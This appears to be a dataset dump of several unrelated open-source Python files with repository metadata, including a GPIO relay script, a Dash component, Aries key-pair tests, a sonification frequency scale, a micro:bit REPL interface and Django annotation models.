2657be639bce88e5774f3b16c11ecbb33c41bc83
|
[
"MIT"
] | null | null | null |
personas.py
|
Ulzahk/Practica-Python-CRUD
|
2657be639bce88e5774f3b16c11ecbb33c41bc83
|
[
"MIT"
] | null | null | null |
personas.py
|
Ulzahk/Practica-Python-CRUD
|
2657be639bce88e5774f3b16c11ecbb33c41bc83
|
[
"MIT"
] | null | null | null |
class Person:
def __init__(self, name, age):
self.name = name
self.age = age
def say_hello(self):
print('Hello, my name is {} and I am {} years old'.format(self.name, self.age))
if __name__ == '__main__':
person = Person('David', 34)
print('Age: {}'.format(person.age))
person.say_hello()
| 18.888889
| 87
| 0.585294
| 212
| 0.623529
| 0
| 0
| 0
| 0
| 0
| 0
| 70
| 0.205882
|
b80d9fd4d22bb1d71b3dd29f2cdfd01260186b03
| 614
|
py
|
Python
|
python/right_couch_move.py
|
ktmock13/PiCouch
|
21992efca9fa382c7a02c10fb037a994143038c6
|
[
"Apache-2.0"
] | null | null | null |
python/right_couch_move.py
|
ktmock13/PiCouch
|
21992efca9fa382c7a02c10fb037a994143038c6
|
[
"Apache-2.0"
] | null | null | null |
python/right_couch_move.py
|
ktmock13/PiCouch
|
21992efca9fa382c7a02c10fb037a994143038c6
|
[
"Apache-2.0"
] | null | null | null |
import RPi.GPIO as GPIO
from time import sleep
import sys
#setup
GPIO.setmode(GPIO.BOARD)
openRelay=11
closeRelay=13
GPIO.setup(openRelay, GPIO.OUT)
GPIO.setup(closeRelay, GPIO.OUT)
#get cmd args
duration = float(sys.argv[1])
opening = sys.argv[2] in ['true', 'True', '1', 'TRUE']
relay = openRelay if opening else closeRelay
#start
GPIO.output(relay, GPIO.HIGH)
print 'starting ' + ('open' if opening else 'close') + ' signal..'
#wait
print ' ' + str(duration) + 'secs'
sleep(duration)
#stop
print ' ...ending signal'
GPIO.output(relay, GPIO.LOW)
| 20.466667
| 66
| 0.640065
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 178
| 0.289902
|
b80eb5f1166695a86c73eccb3c18067bd324e51b
| 3,725
|
py
|
Python
|
lib/python3.7/site-packages/dash_bootstrap_components/_components/Popover.py
|
dukuaris/Django
|
d34f3e3f09028511e96b99cae7faa1b46458eed1
|
[
"MIT"
] | null | null | null |
lib/python3.7/site-packages/dash_bootstrap_components/_components/Popover.py
|
dukuaris/Django
|
d34f3e3f09028511e96b99cae7faa1b46458eed1
|
[
"MIT"
] | 12
|
2020-06-06T01:22:26.000Z
|
2022-03-12T00:13:42.000Z
|
lib/python3.7/site-packages/dash_bootstrap_components/_components/Popover.py
|
dukuaris/Django
|
d34f3e3f09028511e96b99cae7faa1b46458eed1
|
[
"MIT"
] | null | null | null |
# AUTO GENERATED FILE - DO NOT EDIT
from dash.development.base_component import Component, _explicitize_args
class Popover(Component):
"""A Popover component.
Keyword arguments:
- children (a list of or a singular dash component, string or number; optional): The children of this component
- id (string; optional): The ID of this component, used to identify dash components
in callbacks. The ID needs to be unique across all of the
components in an app.
- style (dict; optional): Defines CSS styles which will override styles previously set.
- className (string; optional): Often used with CSS to style elements with common properties.
- key (string; optional): A unique identifier for the component, used to improve
performance by React.js while rendering components
See https://reactjs.org/docs/lists-and-keys.html for more info
- placement (a value equal to: 'auto', 'auto-start', 'auto-end', 'top', 'top-start', 'top-end', 'right', 'right-start', 'right-end', 'bottom', 'bottom-start', 'bottom-end', 'left', 'left-start', 'left-end'; optional): Specify popover placement.
- target (string; optional): ID of the component to attach the popover to.
- container (string; optional): Where to inject the popper DOM node, default body.
- is_open (boolean; optional): Whether the Popover is open or not.
- hide_arrow (boolean; optional): Hide popover arrow.
- innerClassName (string; optional): CSS class to apply to the popover.
- delay (dict; optional): Optionally override show/hide delays - default {show: 0, hide: 250}. delay has the following type: dict containing keys 'show', 'hide'.
Those keys have the following types:
- show (number; optional)
- hide (number; optional) | number
- offset (string | number; optional): Popover offset.
- loading_state (dict; optional): Object that holds the loading state object coming from dash-renderer. loading_state has the following type: dict containing keys 'is_loading', 'prop_name', 'component_name'.
Those keys have the following types:
- is_loading (boolean; optional): Determines if the component is loading or not
- prop_name (string; optional): Holds which property is loading
- component_name (string; optional): Holds the name of the component that is loading"""
@_explicitize_args
def __init__(self, children=None, id=Component.UNDEFINED, style=Component.UNDEFINED, className=Component.UNDEFINED, key=Component.UNDEFINED, placement=Component.UNDEFINED, target=Component.UNDEFINED, container=Component.UNDEFINED, is_open=Component.UNDEFINED, hide_arrow=Component.UNDEFINED, innerClassName=Component.UNDEFINED, delay=Component.UNDEFINED, offset=Component.UNDEFINED, loading_state=Component.UNDEFINED, **kwargs):
self._prop_names = ['children', 'id', 'style', 'className', 'key', 'placement', 'target', 'container', 'is_open', 'hide_arrow', 'innerClassName', 'delay', 'offset', 'loading_state']
self._type = 'Popover'
self._namespace = 'dash_bootstrap_components/_components'
self._valid_wildcard_attributes = []
self.available_properties = ['children', 'id', 'style', 'className', 'key', 'placement', 'target', 'container', 'is_open', 'hide_arrow', 'innerClassName', 'delay', 'offset', 'loading_state']
self.available_wildcard_properties = []
_explicit_args = kwargs.pop('_explicit_args')
_locals = locals()
_locals.update(kwargs) # For wildcard attrs
args = {k: _locals[k] for k in _explicit_args if k != 'children'}
for k in []:
if k not in args:
raise TypeError(
'Required argument `' + k + '` was not specified.')
super(Popover, self).__init__(children=children, **args)
| 67.727273
| 432
| 0.720537
| 3,612
| 0.969664
| 0
| 0
| 1,483
| 0.398121
| 0
| 0
| 2,534
| 0.680268
|
b81062d8563ac7d8651bf77dad80875a2f3da169
| 3,954
|
py
|
Python
|
aries_cloudagent/wallet/tests/test_key_pair.py
|
kuraakhilesh8230/aries-cloudagent-python
|
ee384d1330f6a50ff45a507392ce54f92900f23a
|
[
"Apache-2.0"
] | 247
|
2019-07-02T21:10:21.000Z
|
2022-03-30T13:55:33.000Z
|
aries_cloudagent/wallet/tests/test_key_pair.py
|
kuraakhilesh8230/aries-cloudagent-python
|
ee384d1330f6a50ff45a507392ce54f92900f23a
|
[
"Apache-2.0"
] | 1,462
|
2019-07-02T20:57:30.000Z
|
2022-03-31T23:13:35.000Z
|
aries_cloudagent/wallet/tests/test_key_pair.py
|
kuraakhilesh8230/aries-cloudagent-python
|
ee384d1330f6a50ff45a507392ce54f92900f23a
|
[
"Apache-2.0"
] | 377
|
2019-06-20T21:01:31.000Z
|
2022-03-30T08:27:53.000Z
|
from asynctest import TestCase as AsyncTestCase
import json
from ...storage.error import StorageNotFoundError
from ..util import bytes_to_b58
from ..key_type import KeyType
from ...core.in_memory import InMemoryProfile
from ...storage.in_memory import InMemoryStorage
from ..key_pair import KeyPairStorageManager, KEY_PAIR_STORAGE_TYPE
class TestKeyPairStorageManager(AsyncTestCase):
test_public_key = b"somepublickeybytes"
test_secret = b"verysecretkey"
async def setUp(self):
self.profile = InMemoryProfile.test_profile()
self.store = InMemoryStorage(self.profile)
self.key_pair_mgr = KeyPairStorageManager(self.store)
async def test_create_key_pair(self):
await self.key_pair_mgr.store_key_pair(
public_key=self.test_public_key,
secret_key=self.test_secret,
key_type=KeyType.ED25519,
)
verkey = bytes_to_b58(self.test_public_key)
record = await self.store.find_record(KEY_PAIR_STORAGE_TYPE, {"verkey": verkey})
assert record
value = json.loads(record.value)
assert record.tags == {"verkey": verkey, "key_type": KeyType.ED25519.key_type}
assert value["verkey"] == verkey
assert value["secret_key"] == bytes_to_b58(self.test_secret)
assert value["metadata"] == {}
assert value["key_type"] == KeyType.ED25519.key_type
async def test_get_key_pair(self):
await self.key_pair_mgr.store_key_pair(
public_key=self.test_public_key,
secret_key=self.test_secret,
key_type=KeyType.ED25519,
)
verkey = bytes_to_b58(self.test_public_key)
key_pair = await self.key_pair_mgr.get_key_pair(verkey)
assert key_pair["verkey"] == verkey
assert key_pair["secret_key"] == bytes_to_b58(self.test_secret)
assert key_pair["metadata"] == {}
assert key_pair["key_type"] == KeyType.ED25519.key_type
async def test_get_key_pair_x_not_found(self):
with self.assertRaises(StorageNotFoundError):
await self.key_pair_mgr.get_key_pair("not_existing_verkey")
async def test_delete_key_pair(self):
await self.key_pair_mgr.store_key_pair(
public_key=self.test_public_key,
secret_key=self.test_secret,
key_type=KeyType.ED25519,
)
verkey = bytes_to_b58(self.test_public_key)
record = await self.store.find_record(KEY_PAIR_STORAGE_TYPE, {"verkey": verkey})
assert record
await self.key_pair_mgr.delete_key_pair(verkey)
# should be deleted now
with self.assertRaises(StorageNotFoundError):
await self.key_pair_mgr.delete_key_pair(verkey)
async def test_delete_key_pair_x_not_found(self):
with self.assertRaises(StorageNotFoundError):
await self.key_pair_mgr.delete_key_pair("non_existing_verkey")
async def test_update_key_pair_metadata(self):
await self.key_pair_mgr.store_key_pair(
public_key=self.test_public_key,
secret_key=self.test_secret,
key_type=KeyType.ED25519,
metadata={"some": "data"},
)
verkey = bytes_to_b58(self.test_public_key)
record = await self.store.find_record(KEY_PAIR_STORAGE_TYPE, {"verkey": verkey})
assert record
value = json.loads(record.value)
assert value["metadata"] == {"some": "data"}
await self.key_pair_mgr.update_key_pair_metadata(verkey, {"some_other": "data"})
record = await self.store.find_record(KEY_PAIR_STORAGE_TYPE, {"verkey": verkey})
assert record
value = json.loads(record.value)
assert value["metadata"] == {"some_other": "data"}
async def test_update_key_pair_metadata_x_not_found(self):
with self.assertRaises(StorageNotFoundError):
await self.key_pair_mgr.update_key_pair_metadata("non_existing_verkey", {})
| 35.303571
| 88
| 0.687405
| 3,613
| 0.913758
| 0
| 0
| 0
| 0
| 3,439
| 0.869752
| 333
| 0.084219
|
b8116854eec000b484014c431645628bfade8561
| 6,191
|
py
|
Python
|
sonipy/scales/frequency.py
|
Sabrina-Knappe/sonipy
|
eaf89afaee0d9c2d5ba7a035d43e651b8919b84e
|
[
"MIT"
] | 22
|
2020-07-04T19:05:25.000Z
|
2022-02-25T08:39:01.000Z
|
sonipy/scales/frequency.py
|
Sabrina-Knappe/sonipy
|
eaf89afaee0d9c2d5ba7a035d43e651b8919b84e
|
[
"MIT"
] | 6
|
2020-07-07T17:09:00.000Z
|
2021-04-12T16:37:41.000Z
|
sonipy/scales/frequency.py
|
Sabrina-Knappe/sonipy
|
eaf89afaee0d9c2d5ba7a035d43e651b8919b84e
|
[
"MIT"
] | 6
|
2020-07-07T08:28:33.000Z
|
2021-12-21T03:52:09.000Z
|
from __future__ import print_function
import warnings
import numpy as np
C4 = 261.6 # Hz
piano_max = 4186.01 # Hz
piano_min = 27.5000 # Hz - not audible
__all__ = ['cent_per_value','get_f_min','get_f_max','FrequencyScale']
def cent_per_value(f_min, f_max, v_min, v_max):
"""
This function takes in a frequency max and min, and y value max and min and returns a y scale parameter in units of cents/y value.
Cents are a logarithmic unit of tone intervals (https://en.wikipedia.org/wiki/Cent_(music)).
Parameters
----------
f_min : float
Minimum frequency.
f_max : float
Maximum frequency.
v_min : float
Minimum y value.
v_max : float
Maximum y value.
Returns
-------
float
A y-scale parameter in units of cents/y value.
"""
step = 1200 * np.log2(f_max / f_min) / (v_max - v_min)
return step
def get_f_min(f_max, cents_per_value, v_min, v_max):
"""
This function takes in a y value max and min, a maximum frequency and a y scale parameter in units of cents/y value, and returns the minimum frequency that fits to such a scale.
Cents are a logarithmic unit of tone intervals (https://en.wikipedia.org/wiki/Cent_(music)).
Parameters
----------
f_max : float
Maximum frequency.
cents_per_value : float
A y scale parameter in units of cents/y value.
v_min : float
Minimum y value.
v_max : float
Maximum y value.
Returns
-------
float
Minimum frequency.
"""
f_min = f_max / (2 ** ((v_max - v_min) * cents_per_value / 1200))
return f_min
def get_f_max(f_min, cents_per_value, v_min, v_max):
"""
This function takes in a y value max and min, a minimum frequency and a y scale parameter in units of cents/y value, and returns the maximum frequency that fits to such a scale.
Cents are a logarithmic unit of tone intervals (https://en.wikipedia.org/wiki/Cent_(music)).
Parameters
----------
f_min : float
Minimum frequency.
cents_per_value : float
A y scale parameter in units of cents/y value.
v_min : float
Minimum y value.
v_max : float
Maximum y value.
Returns
-------
float
Maximum frequency.
"""
f_max = f_min * (2 ** ((v_max - v_min) * cents_per_value / 1200))
return f_max
class FrequencyScale(object):
"""
This class builds a frequency scale and populates the namespace of frequency objects based on the given inputs from the following combos:
- frequency_min, frequency_max, y value min and y value max
- frequency_max, cents_per_value, y value min and y value max
- frequency_min, cents_per_value, y value min and y value max
Cents are a logarithmic unit of tone intervals (https://en.wikipedia.org/wiki/Cent_(music)).
Parameters
----------
frequency_min : float
Minimum frequency.
frequency_max : float
Maximum frequency.
cents_per_value : float
A y scale parameter in units of cents/y value.
value_min : float
Description of parameter `value_min`.
value_max : float
Description of parameter `value_max`.
verbose : bool
Flag to toggle printing functions.
"""
def __init__(self, value_min, value_max,
frequency_min=None, frequency_max=None, cents_per_value=None,
verbose=False):
if verbose:
print('initial vals (fmin, fmax, vmin, vmax):',
frequency_min, frequency_max, value_min, value_max)
# checking for which inputs were given
self.y_inputs = []
if frequency_min != None:
self.y_inputs.append('frequency_min')
if frequency_max != None:
self.y_inputs.append('frequency_max')
if cents_per_value != None:
self.y_inputs.append('cents_per_value')
self.y_n_inputs = len(self.y_inputs)
# raising exception if anything other than two inputs were given
if self.y_n_inputs != 2:
raise Exception('Frequency takes 2 of the frequency_min, frequency_max, and cents_per_value inputs. You inputted {} inputs, which were {}.'.format(
self.y_n_inputs, self.y_inputs))
# frequency_min and frequency_max input case
if (cents_per_value == None):
cents_per_value = cent_per_value(frequency_min, frequency_max,
value_min, value_max)
# cents_per_value and frequency_max input case
if (frequency_min == None):
frequency_min = get_f_min(frequency_max, cents_per_value,
value_min, value_max)
# cents_per_value and frequency_min input case
if (frequency_max == None):
frequency_max = get_f_max(frequency_min, cents_per_value,
value_min, value_max)
self.y_value_min = value_min
self.y_value_max = value_max
self.y_frequency_max = frequency_max
self.y_frequency_min = frequency_min
self.y_cents_per_value = cents_per_value
if self.y_frequency_max > piano_max:
warnings.warn('Your maximum frequency of {} Hz is above a pianos maximum of {} Hz.'.format(
np.round(self.y_frequency_max, 2), piano_max))
if self.y_frequency_min < piano_min:
warnings.warn('Your minimum frequency of {} Hz is below a pianos minimum of {} Hz.'.format(
np.round(self.y_frequency_min, 2), piano_min))
if self.y_value_min > self.y_value_max:
warnings.warn('Min y value is greater than max y value.')
if verbose:
print('initial vals (f_min, f_max, y_min, y_max):', self.y_frequency_min,
self.y_frequency_max, self.y_value_min, self.y_value_max)
def freq(v): return self.y_frequency_min * \
2 ** ((v - self.y_value_min) * self.y_cents_per_value / 1200)
self.y_freq_translate_to_range = lambda array: list(map(freq, array))
if verbose:
print('Frequency Scale Built')
| 34.977401
| 181
| 0.63237
| 3,800
| 0.613794
| 0
| 0
| 0
| 0
| 0
| 0
| 3,389
| 0.547408
|
b8118840491eaf33f7fcef02b6ab1cab5378d698
| 338
|
py
|
Python
|
core_admin/des/ccd/daemon.py
|
linea-it/tno
|
f973381280504ceb1b606b5b3ccc79b6b8c2aa4f
|
[
"MIT"
] | null | null | null |
core_admin/des/ccd/daemon.py
|
linea-it/tno
|
f973381280504ceb1b606b5b3ccc79b6b8c2aa4f
|
[
"MIT"
] | 112
|
2018-04-24T19:10:55.000Z
|
2022-02-26T16:55:02.000Z
|
core_admin/des/ccd/daemon.py
|
linea-it/tno
|
f973381280504ceb1b606b5b3ccc79b6b8c2aa4f
|
[
"MIT"
] | null | null | null |
from apscheduler.schedulers.background import BackgroundScheduler
from des.ccd import start_pipeline
def download_queue():
start_pipeline()
scheduler = BackgroundScheduler()
scheduler.add_job(
download_queue,
'interval',
# minutes=1
seconds=20,
max_instances=1,
id='des_download_ccd'
)
scheduler.start()
| 16.095238
| 65
| 0.739645
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 39
| 0.115385
|
b811d6fa0121474e3b20b511fc6bfce131c9ffa7
| 440
|
py
|
Python
|
calc-app/input_console.py
|
t4d-classes/python_10042021
|
e2c28448ad66784c429655ab766f902b76d6ac79
|
[
"MIT"
] | null | null | null |
calc-app/input_console.py
|
t4d-classes/python_10042021
|
e2c28448ad66784c429655ab766f902b76d6ac79
|
[
"MIT"
] | null | null | null |
calc-app/input_console.py
|
t4d-classes/python_10042021
|
e2c28448ad66784c429655ab766f902b76d6ac79
|
[
"MIT"
] | null | null | null |
from common.input import input_int, input_float
def get_operand():
return input_float("Please enter an operand: ")
def get_command():
return input("Enter a command: ")
def get_history_entry_id():
return input_int("Please enter a history entry id: ")
def get_history_file_name():
return input("Enter a history file name: ")
def get_history_report_file_name():
return input("Enter a history report file name: ")
| 20
| 57
| 0.725
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 146
| 0.331818
|
b811e4d73c683e7404a77a68edf057c683bf41a7
| 1,872
|
py
|
Python
|
tools/stimgen/gen_recall.py
|
herenvarno/gsbn
|
47ed0932b605d8b3cf9661f9308908364ad5892e
|
[
"MIT"
] | 2
|
2016-08-12T15:06:02.000Z
|
2021-10-05T08:12:17.000Z
|
tools/stimgen/gen_recall.py
|
herenvarno/gsbn
|
47ed0932b605d8b3cf9661f9308908364ad5892e
|
[
"MIT"
] | 2
|
2017-04-23T17:22:23.000Z
|
2017-05-25T14:22:51.000Z
|
tools/stimgen/gen_recall.py
|
herenvarno/gsbn
|
47ed0932b605d8b3cf9661f9308908364ad5892e
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import os
import sys
import re
import math
import random
import matplotlib.pyplot as plt
import numpy as np
from google.protobuf import text_format
sys.path.append(os.path.dirname(os.path.realpath(__file__))+"/../../build")
import gsbn_pb2
if len(sys.argv) < 1:
print("Arguments wrong! Please retry with command :")
print("python "+os.path.realpath(__file__)+" <output file name>")
exit(-1)
filename = sys.argv[1]
patterns = []
masks = []
DIM_HCU = 10
DIM_MCU = 10
rd = gsbn_pb2.StimRawData()
p = [0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,2,3,4,5,6,7,8,9]
patterns.append(p)
p = [0,1,2,3,4,5,6,7,8,0xfffffff]
patterns.append(p)
p = [0,1,2,3,4,5,6,7,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,2,3,4,5,6,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,2,3,4,5,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,2,3,4,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,2,3,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,2,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
m = [0,0,0,0,0,0,0,0,0,0]
masks.append(m)
m = [1,1,1,1,1,1,1,1,1,1]
masks.append(m)
for p in patterns:
for v in p:
rd.data.append(v)
for p in masks:
for v in p:
rd.mask.append(v)
rd.data_rows = len(patterns)
rd.data_cols = DIM_HCU
rd.mask_rows = len(masks)
rd.mask_cols = DIM_HCU
with open(filename, "wb+") as f:
f.write(rd.SerializeToString())
| 25.643836
| 115
| 0.744658
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 116
| 0.061966
|
b81231fb69c94c906db0d3069a6a4df0633be007
| 174
|
py
|
Python
|
python/find_country/city.py
|
lukasjoc/scritps
|
ebcffef0a3977ab8bb1bebf20383c350bd7baa37
|
[
"0BSD"
] | 1
|
2020-11-09T19:32:43.000Z
|
2020-11-09T19:32:43.000Z
|
python/find_country/city.py
|
lukasjoc/scritps
|
ebcffef0a3977ab8bb1bebf20383c350bd7baa37
|
[
"0BSD"
] | null | null | null |
python/find_country/city.py
|
lukasjoc/scritps
|
ebcffef0a3977ab8bb1bebf20383c350bd7baa37
|
[
"0BSD"
] | null | null | null |
#!/usr/bin/env python3
from geopy.geocoders import Nominatim
locator = Nominatim(user_agent="getcity")
loc = locator.geocode("Munich")
print(loc.latitude, loc.longitude)
| 17.4
| 41
| 0.764368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 39
| 0.224138
|
b8126bfcea007e0faa9e48fd38823790a37c5d11
| 6,448
|
py
|
Python
|
bitio/src/microbit/repl/repl.py
|
hungjuchen/Atmosmakers
|
4e8e64fba3d7a31840f69a5aa3823247aa5dca02
|
[
"MIT"
] | 85
|
2017-06-09T20:53:46.000Z
|
2022-03-09T21:35:05.000Z
|
bitio/src/microbit/repl/repl.py
|
hungjuchen/Atmosmakers
|
4e8e64fba3d7a31840f69a5aa3823247aa5dca02
|
[
"MIT"
] | 34
|
2017-06-09T20:52:05.000Z
|
2021-02-19T19:49:45.000Z
|
bitio/src/microbit/repl/repl.py
|
hungjuchen/Atmosmakers
|
4e8e64fba3d7a31840f69a5aa3823247aa5dca02
|
[
"MIT"
] | 32
|
2017-06-09T10:15:19.000Z
|
2021-11-20T09:08:08.000Z
|
# repl/repl.py
#
# A REPL interface to a micro:bit or similar device running MicroPython
# This is written on top of pyserial, however the dependency on pyserial
# is soft (as the serial instance is passed in as a constructor parameter
# and the detection of the need to bytes-encode strings is dynamic).
# Thus you can pass in any object that implements the following interface:
# write(str)
# read()-> str
# and/or this interface:
# write(bytes)
# read()->bytes
import time
import re
class REPLException(Exception):
def __init__(self, msg=None):
Exception.__init__(self, msg)
class REPL():
def __init__(self, ser):
self.ser = ser
def rx(): # always return a str(1) regardless of python version
data = ser.read(1)
if len(data) == 0:
return None
if type(data) == str: # pyserial2
d = data[0]
elif type(data) == bytes: # pyserial3
d = data[0] # this will be a bytes() of len 1
d = chr(d)
else: # no idea!
raise REPLException("Unknown return type from ser.read:%s" % str(type(data)))
return d
self.readch = rx
def receive(self, wanted=None, min_length=None, max_length=None, timeout=None, idle_timeout=None):
##print("trying to receive:%s" % str(wanted))
if wanted is not None:
matcher = re.compile(wanted, re.DOTALL)
else:
matcher = None
now = time.time()
if timeout is not None:
timeout_at = now + timeout
else:
timeout_at = None
if idle_timeout is not None:
idle_timeout_at = now + idle_timeout
else:
idle_timeout_at = None
buffer = ""
while True:
now = time.time()
ch = self.readch()
if ch is not None:
buffer += ch
if idle_timeout is not None:
idle_timeout_at = now + idle_timeout
if matcher is not None and idle_timeout is None and matcher.match(buffer):
if min_length is None:
##print("got:%s" % buffer)
return buffer #TODO get captures
elif len(buffer) >= min_length:
##print("got:%s" % buffer)
return buffer
if max_length is not None and len(buffer) >= max_length:
raise REPLException("buffer overflow? [%s]" % buffer)
if timeout_at is not None and now >= timeout_at:
raise REPLException("Timeout trying to receive [%s]" % buffer)
if idle_timeout_at is not None and now >= idle_timeout_at:
if matcher is not None and matcher.match(buffer):
if min_length is None:
##print("got:%s" % buffer)
return buffer
elif len(buffer) >= min_length:
return buffer
##print("got:%s" % buffer)
else:
raise REPLException("Did not match at end of idle timeout, too short [%s]" % buffer)
else:
raise REPLException("Did not match at end of idle timeout [%s]" % buffer)
def to_raw(self):
##print("**** WAITING FOR PROMPT")
if not self.wait_prompt():
##print("**** SENDING CTRL-C to force a prompt")
self.ctrl_c() # try to stop running user program
self.ctrl_b() # also if already at raw REPL, trigger exit from it
##print("**** waiting for prompt response")
if not self.wait_prompt():
raise REPLException("could not get a prompt")
##print("**** SENDING CTRL-A to get raw repl")
self.ctrl_a() # enter raw REPL mode
self.wait_repl_response()
##print("**** GOT RAW REPL")
def wait_prompt(self):
try:
##print("*** waiting for prompt")
self.receive(".*>>> ", timeout=2, idle_timeout=1)
except REPLException as e:
##print("*** REPLEXCEPTION:%s" % str(e))
return False
return True
##TODO: This does not work at all in Python 3, It seems to encode as b'\x00 \x00 \x00'
#and as a result the REPL does not respond at all. But it works in Python 2 at the moment
#still.
# if we pass in chr(ord(code)-64) we get a 'can't handle unicode \x03' error in ser.write.
# Note: Martin O'Hanlon said in BlueDot he wrote a to_bytes.
# There is a to_bytes inside PySerial, but for some reason the REPL prompt is not
# detected - perhaps that is less to do with byte encoding, and more to do with
# string comparisons failing? Put some debug on this and see what actually is sent and returned.
def ctrl_c(self):
self.ser.write(b'\x03')
def ctrl_a(self):
self.ser.write(b'\x01')
def ctrl_b(self):
self.ser.write(b'\x02')
def ctrl_d(self):
self.ser.write(b'\x04')
def wait_repl_response(self):
self.receive("\r\nraw REPL; CTRL-B to exit\r\n>", timeout=2)
def _send_command(self, cmd):
self.ser.write(cmd)
def send_command(self, cmd):
#pyserial 3 or greater will not cope with strings, must be bytes
#but we don't want a hard dependency to 'serial' module, and this is
#not really a python3 thing, it's a pyserial thing.
#We resolve this by catching the first TypeError and rewriting the wrapper
#function for future calls.
try:
self._send_command(cmd)
except TypeError:
def _new_send_command(cmd):
cmd = bytes(cmd, 'UTF-8')
self.ser.write(cmd)
self._send_command = _new_send_command
self._send_command(cmd)
self.ctrl_d()
def wait_response(self):
self.receive("OK", timeout=1, min_length=2)
output_text = self.receive(".*\x04")
exception_text = self.receive(".*\x04", timeout=1)
output_text = output_text[:-1] # strip CTRL-D
exception_text = exception_text[:-1] # strip CTRL-D
self.receive(">", timeout=1)
if exception_text != "":
raise REPLException("REPL exception:%s" % exception_text)
return output_text
# END
| 35.234973
| 108
| 0.563896
| 5,942
| 0.921526
| 0
| 0
| 0
| 0
| 0
| 0
| 2,366
| 0.366935
|
b812c3ba84401bea4ea454da2ee284c224fe8b47
| 44
|
py
|
Python
|
lib/connection/RequestException.py
|
Karaya-12/Website-Dir-Scanner
|
04b150524631e2fff00a319b7daab7f4d32ddb18
|
[
"MIT"
] | 3
|
2019-09-30T07:12:58.000Z
|
2020-08-15T10:50:51.000Z
|
emailrep/exceptions.py
|
pry0cc/emailrep.io-python
|
c33839d327d438e75b4e6eea462ab15677462d54
|
[
"MIT"
] | null | null | null |
emailrep/exceptions.py
|
pry0cc/emailrep.io-python
|
c33839d327d438e75b4e6eea462ab15677462d54
|
[
"MIT"
] | 1
|
2019-08-22T15:35:11.000Z
|
2019-08-22T15:35:11.000Z
|
class RequestException(Exception):
pass
| 14.666667
| 34
| 0.772727
| 43
| 0.977273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
b814083d787036eed69c0998c2575b86f722e9ca
| 3,172
|
py
|
Python
|
src/cocoannot/annotpreferred/models.py
|
coco-tasks/annotation-tool
|
ebd2e77ec8aeddedb9f87f457b6d5d8989b602db
|
[
"MIT"
] | 9
|
2019-04-18T15:35:38.000Z
|
2021-06-07T08:01:27.000Z
|
src/cocoannot/annotpreferred/models.py
|
coco-tasks/annotation-tool
|
ebd2e77ec8aeddedb9f87f457b6d5d8989b602db
|
[
"MIT"
] | 1
|
2019-07-16T10:07:09.000Z
|
2019-07-16T10:07:09.000Z
|
src/cocoannot/annotpreferred/models.py
|
coco-tasks/annotation-tool
|
ebd2e77ec8aeddedb9f87f457b6d5d8989b602db
|
[
"MIT"
] | 3
|
2020-05-20T12:06:59.000Z
|
2020-12-12T06:45:26.000Z
|
from django.contrib.auth.models import User
from django.db import models
from markdownx.models import MarkdownxField
class Category(models.Model):
"""
Represents a COCO category
"""
coco_id = models.IntegerField(unique=True, db_index=True)
name = models.CharField(max_length=50)
supercategory = models.CharField(max_length=50)
def __str__(self):
return "Category {}: {} ({})".format(self.coco_id, self.name, self.supercategory)
class Task(models.Model):
"""
Represents a Task
"""
number = models.IntegerField(unique=True, db_index=True)
name = models.CharField(max_length=50)
desc = models.TextField(blank=True, null=True)
desc_image = models.ImageField(upload_to='task_images', blank=True, default=None, null=True)
def __str__(self):
return "Task {}: {}".format(self.number, self.name)
class Image(models.Model):
"""
Represents an image in the dataset
"""
coco_id = models.IntegerField(unique=True, db_index=True)
path = models.CharField(max_length=200)
set_name = models.CharField(max_length=10)
width = models.IntegerField()
height = models.IntegerField()
related_tasks = models.ManyToManyField(Task)
def __str__(self):
return "Image {}".format(self.coco_id)
class Annot(models.Model):
"""
Represents a COCO annotation for instances.
"""
coco_id = models.IntegerField(unique=True, db_index=True)
image = models.ForeignKey(Image, on_delete=models.CASCADE)
category = models.ForeignKey(Category, on_delete=models.CASCADE)
area = models.FloatField()
iscrowd = models.BooleanField()
bbox_x = models.FloatField()
bbox_y = models.FloatField()
bbox_w = models.FloatField()
bbox_h = models.FloatField()
segmentation = models.TextField() # I am going to store the segmentation as a text field.
# I will convert it into json on demand.
def __str__(self):
return "Annot {} ({})".format(self.coco_id, self.category)
def get_bbox(self):
return [self.bbox_x, self.bbox_y, self.bbox_w, self.bbox_h]
def set_bbox(self, bbox):
bbox = tuple(bbox)
self.bbox_x, self.bbox_y, self.bbox_w, self.bbox_h = bbox
class Job(models.Model):
"""
Represents a job (an annotation of the preferred objects) for an image by a user.
"""
task = models.ForeignKey(Task, on_delete=models.CASCADE, db_index=True)
image = models.ForeignKey(Image, on_delete=models.CASCADE, db_index=True)
user = models.ForeignKey(User, on_delete=models.CASCADE, db_index=True)
is_example = models.BooleanField(default=False, db_index=True)
is_done = models.BooleanField(default=False, db_index=True)
date_created = models.DateTimeField(auto_now_add=True)
def __str__(self):
return "Job[task={}, image={}, user={}]".format(self.task.name, self.image_id, self.user.first_name)
class PreferredAnnot(models.Model):
job = models.ForeignKey(Job, on_delete=models.CASCADE, db_index=True)
annot = models.ForeignKey(Annot, on_delete=models.CASCADE, db_index=True)
class AnnotationPolicy(models.Model):
